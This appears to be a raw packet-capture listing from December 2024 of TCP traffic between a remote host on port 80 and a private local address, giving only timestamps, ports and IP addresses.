Dec 14, 2024 12:56:17.112834930 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.112899065 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.113007069 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.113065958 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.114037037 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.114053965 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.114101887 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.115171909 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.115232944 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.115293980 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.115350008 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.116405964 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.116461039 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.116529942 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.116590023 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.117542028 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.117605925 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.117649078 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.117707968 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.118738890 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.118798971 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.118838072 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.118896961 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.119918108 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.119977951 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.120069027 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.120129108 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.121114016 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.121172905 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.121217966 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.121278048 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.122278929 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.122339964 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.122401953 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.122464895 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.123466969 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.123528004 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.123621941 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.123682022 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.124696016 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.124757051 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.124787092 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.124845028 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.127590895 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.127645016 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.127659082 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.127743006 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.127782106 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.127782106 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.127782106 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.127875090 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.128273964 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.128338099 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.128381014 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.128434896 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.129406929 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.129467964 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.129683018 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.129743099 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.130574942 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.130631924 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.130686998 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.130747080 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.131742001 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.131802082 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.131854057 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.131910086 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.132970095 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.133033037 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.133182049 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.133240938 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.134193897 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.134251118 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.134391069 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.134448051 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.135344982 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.135407925 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.135421038 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.135478020 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.136466980 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.136527061 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.136571884 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.136642933 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.137784958 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.137845993 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.137883902 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.137944937 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.138896942 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.138955116 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.138993979 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.139050961 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.140034914 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.140093088 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.140125036 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.140182972 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.141186953 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.141244888 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.141305923 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.141362906 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.142416000 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.142476082 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.142497063 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.142568111 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.143701077 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.143781900 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.143824100 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.143866062 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.144817114 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.144875050 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.144896030 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.144956112 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.145972013 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.146034002 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.146078110 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.146138906 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.147119045 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.147176981 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.147231102 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.147289991 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.148314953 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.148375034 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.148403883 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.148461103 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.149494886 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.149554014 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.149682045 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.149741888 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.150753021 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.150799036 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.150813103 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.150845051 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.151849985 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.151912928 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.152091980 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.152149916 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.153033972 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.153095007 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.153139114 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.153194904 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.154242039 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.154300928 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.154377937 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.154436111 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.155457020 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.155524015 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.286005020 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.286209106 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.286324978 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.286324978 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.286570072 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.286701918 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.286796093 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.286796093 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.287552118 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.287631035 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.287642956 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.287735939 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.288595915 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.288664103 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.288705111 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.288767099 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.289804935 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.289869070 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.289913893 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.289973974 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.290972948 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.291038036 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.291268110 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.291352987 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.292519093 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.292589903 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.292627096 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.292687893 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.293462038 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.293521881 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.293550014 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.293610096 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.294502020 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.294563055 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.294625998 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.294687033 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.295608997 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.295675039 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.295727015 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.295783997 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.296871901 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.296938896 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.297082901 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.297143936 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.298472881 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.298491955 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.298537016 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.298585892 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.299437046 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.299474001 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.299500942 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.299532890 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.300378084 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.300396919 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.300442934 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.301559925 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.301625013 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.301708937 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.301772118 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.302752972 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.302833080 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.302853107 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.302911997 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.303977013 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.304040909 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.304044008 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.304101944 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.305088043 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.305143118 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.305196047 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.305258036 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.306297064 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.306360006 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.306400061 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.306458950 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.307498932 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.307565928 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.307585955 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.307648897 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.308628082 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.308690071 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.308733940 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.308795929 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.309811115 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.309875011 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.309958935 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.310020924 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.311100960 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.311162949 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.311258078 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.311328888 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.312413931 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.312478065 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.312575102 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.312634945 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.313612938 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.313674927 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.313692093 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.313752890 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.315011024 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.315073967 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.315229893 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.315298080 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.316203117 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.316265106 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.316307068 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.316366911 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.317567110 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.317629099 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.317735910 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.317796946 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.318772078 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.318790913 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.318835020 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.318867922 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.319989920 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.320053101 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.320101023 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.320168972 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.321084976 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.321149111 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.321199894 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.321258068 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.322200060 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.322261095 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.322294950 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.322354078 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.323434114 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.323510885 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.323553085 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.323606968 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.324470997 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.324531078 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.324551105 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.324608088 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.325378895 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.325442076 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.325520039 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.325581074 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.326421022 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.326483011 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.326587915 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.326648951 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.327563047 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.327630997 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.327708006 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.327785969 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.328800917 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.328860044 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.328875065 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.328942060 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.329951048 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.330012083 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.330051899 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.330106974 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.331168890 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.331239939 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.331394911 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.331454992 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.332331896 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.332391977 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.332423925 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.332480907 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.333482981 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.333544970 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.333622932 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.333683968 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.334712982 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.334781885 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.334820032 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.334876060 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.335869074 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.335931063 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.335971117 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.336028099 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.337074995 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.337138891 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.337182045 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.337249994 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.338231087 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.338293076 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.338470936 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.338531971 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.339436054 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.339498997 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.339525938 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.339581966 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.340621948 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.340745926 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.340756893 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.340821028 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.341842890 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.341861010 CET	80	49778	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:17.341907978 CET	49778	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:17.343046904 CET	80	49778	185.215.113.16	192.168.2.4
